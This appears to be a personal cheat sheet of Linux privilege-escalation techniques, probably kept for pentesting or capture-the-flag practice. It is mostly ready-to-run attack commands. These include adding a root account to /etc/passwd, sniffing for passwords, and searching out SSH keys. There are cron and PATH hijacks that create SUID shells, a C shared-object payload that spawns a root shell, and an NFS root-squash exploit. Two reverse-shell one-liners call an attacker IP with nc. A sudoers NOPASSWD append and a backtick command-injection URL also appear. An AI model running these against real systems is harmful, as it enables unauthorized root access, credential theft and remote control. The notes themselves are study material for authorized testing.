Enumeration

  • id
  • sudo -l - what can we run using sudo
  • history - could have some juicy details in history
  • cat /etc/passwd
    • If you can somehow edit /etc/passwd:
      1. openssl passwd $newPassword
      2. echo "$newUser:$hashAbove:0:0:root:/root:/bin/bash" >> /etc/passwd
      1. or simply copy$hashAbove^ into root:<this spot>:etc within the /etc/passwd file
  • uname -a - kernel exploits
    • cat /etc/issue
  • hostname
  • ps -aux
    • watch -n 1 "ps -aux | grep $searchTerm$"
  • ipconfig
  • ss -anp or netstat
  • dpkg -l (to list applications installed by dpkg)
  • find / -writable -type d 2>/dev/null (find writable directories)
  • history or cat any /home/.history files
  • check /home/.ssh for keys
  • su root (can’t hurt to try)
  • sudo tcpdump -i lo -A | grep "pass"
  • ip neigh - ipv4 neighbor table
  • netstat -ano - what ports are open and what communications exist
  • dpkg -l - list installed programs
  • check /var, /opt, /usr/local/src and “/usr/src/ for anything interesting
  • find / -writable -type d 2>/dev/null - find writable directories
  • TCM Color Command: grep --color=auto -rnw '/' -ie "$searchTerm" --color=always 2> /dev/null (searches for the term and spits it out in red)
  • From the directory you want to search: grep -r "$searchTerm"

Privilege Escalation

Automated tools

  • linpeas.sh
  • unix-privesc-check
  • lse.sh

SUID Executables

SUID stands for “Set User ID”, and it is a special type of permission that can be given to a file so the file is always run with the permissions of the owner instead of the user executing it.

  • find / -user root -perm -4000 -print 2>/dev/null
  • find / -type f -perm -04000 -ls 2>/dev/null
  • find / -type f -perm -u=s 2>/dev/null | xargs ls -l
  • find / -perm -u=s -type f 2>/dev/null
  • find / -user root -perm -4000 -exec ls -ldb {} \;
  • There may be more
  • drwxr-x-r–
    • this is a directory with read/write/execute for the owner, read/execute for the group, and read for everyone else
    • if there is an S where the first x would be, that is a SUID (vs GUID for group id or sticky bit for the last one which would be a t)

Kernel Exploits

uname -a - check which kernel lsmod - List Kernel modules

  • /sbin/modinfo $moduleName

Passwords and File Permissions

  • history
  • find /etc -type f -exec grep -i -I "pass" {} /dev/null \; 2>/dev/null
    • for the /etc directory
  • find / -name id_rsa 2>/dev/null or authorized_keys

Sudo Escalations

  • sudo -l then “gtfobins.github.io”
  • Escalation via LD_PRELOAD - if you see this in the output, it means you can preload libraries, and you can use that to load a bash shell prior to actually executing one of the commands you’re able to load.
    • Code here: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#ld_preload-and-ld_library_path

Scheduled Tasks

Take note of where the PATH is if the full PATH isn’t declared grep "CRON" /var/log/syslog ls -lah /etc/cron* cat /etc/crontab

  • especially for processes running as root
  • echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > $cronScript
    • then you can execute /tmp bash because of the +s

Shared Object Injection

strace $binary 2>&1 - strace intercepts and records the system calls which are called by a process and the signals which are received by a process.

  • then try to overwrite anything that shows up as (No such file or directory)
  • may need a .c file to exploit, EX:
#include <stdio.h>
#include <stdlib.h>

static void inject() __attribute__((constructor));

void inject() {
	system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");
}

Then: gcc -shared -fPIC -o $outputLocation $exploitLocation.c -gcc -shared -fPIC -nostartfiles -o file file.c

  • note that you can change this to $file.so

Vulnerability with nginx, an http and reverse proxy server https://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html

Escalation via Environmental Variables

Run the find SUID command, then run strings on the binary if you don’t know what it does If it starts a service from the PATH, you can print $PATH

  • If it doesn’t have a direct PATH:
    • one line c command: echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0;}' > /tmp/service.c
    • so the one liner is actually: int main() { setgid(0); setuid(0); system("/bin/bash"); return 0;}
    • then gcc /tmp/service.c -o /tmp/service
    • then: export PATH=/tmp:$PATH
    • This means that when you call a service, the system will check /tmp first as it is the start of the PATH
  • If it does have a direct PATH (like /usr/sbin/service)
    • function /usr/sbin/service() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }
    • export -f /usr/sbin/service -

Capabilities

getcap -r / 2>/dev/null - this will show up during linpeas, but it’s still good to know

NFS Root Squashing

  • cat /etc/exports
    • if it says 'no_root_squash' then the directory shown is shareable and can be mounted
    • Because it’s no root squash, everything we do as root on our machine, it will be as root as the target machine even though we are a normal user on the target so from kali:
  • mkdir /tmp/mountme
  • mount -o rw,vers=2 $kaliIP:/tmp /tmp/mountme
  • echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/mountme/x.c
  • gcc /tmp/mountme/x.c -o /tmo/mountme/x
  • chmod +s /tmp/mountme/x then from target:
  • ./x

Other

Reverse shells:

  • busybox nc $kaliIP 4444 -e sh
  • rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $kaliIP $kaliPort >/tmp/f

Add file to path: export PATH="/usr/lib/gcc/i486-linux-gnu/4.6/:$PATH"

If you can edit /etc/sudoers:

  • "echo $user ALL=(ALL) NOPASSWD: ALL >> c:$LFILE"

Remember that backticks can take precedence over other commands. Ex:

  • In URL: 10.10.186.101:8081/ping?ip=ls